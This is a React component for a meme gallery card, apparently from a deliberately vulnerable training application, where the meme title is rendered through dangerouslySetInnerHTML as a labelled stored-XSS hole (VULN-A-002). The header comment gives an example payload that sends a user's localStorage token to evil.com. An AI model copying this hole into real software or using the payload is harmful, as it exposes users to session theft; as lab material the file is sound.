/**
 * MemeCard component.
 * VULN-A-002: Uses dangerouslySetInnerHTML to render meme title — stored XSS.
 * If an attacker injects a meme title like: <img src=x onerror="fetch('https://evil.com/'+localStorage.getItem('token'))">
 * it will execute when any user views the gallery.
 */
import React from "react";

interface Meme {
  id: number;
  title: string;
  top_text: string;
  bottom_text: string;
  s3_url: string;
  thumbnail_url?: string;
  mitre_technique_id?: string;
  mitre_tactic?: string;
  view_count: number;
  like_count: number;
}

interface MemeCardProps {
  meme: Meme;
  onClick?: (meme: Meme) => void;
}

const MemeCard: React.FC<MemeCardProps> = ({ meme, onClick }) => {
  return (
    <div
      className="meme-card"
      onClick={() => onClick?.(meme)}
      style={{ cursor: "pointer" }}
    >
      {/* VULN-A-002: dangerouslySetInnerHTML renders stored XSS payloads */}
      <h3
        className="meme-title"
        dangerouslySetInnerHTML={{ __html: meme.title }}
      />

      <img
        src={meme.thumbnail_url ?? meme.s3_url}
        alt={meme.top_text}
        className="meme-image"
        loading="lazy"
      />

      {meme.mitre_technique_id && (
        <div className="meme-technique">
          <span className="technique-id">{meme.mitre_technique_id}</span>
          {meme.mitre_tactic && (
            <span className="tactic-name">{meme.mitre_tactic}</span>
          )}
        </div>
      )}

      <div className="meme-stats">
        <span>👁 {meme.view_count}</span>
        <span>❤ {meme.like_count}</span>
      </div>
    </div>
  );
};

export default MemeCard;
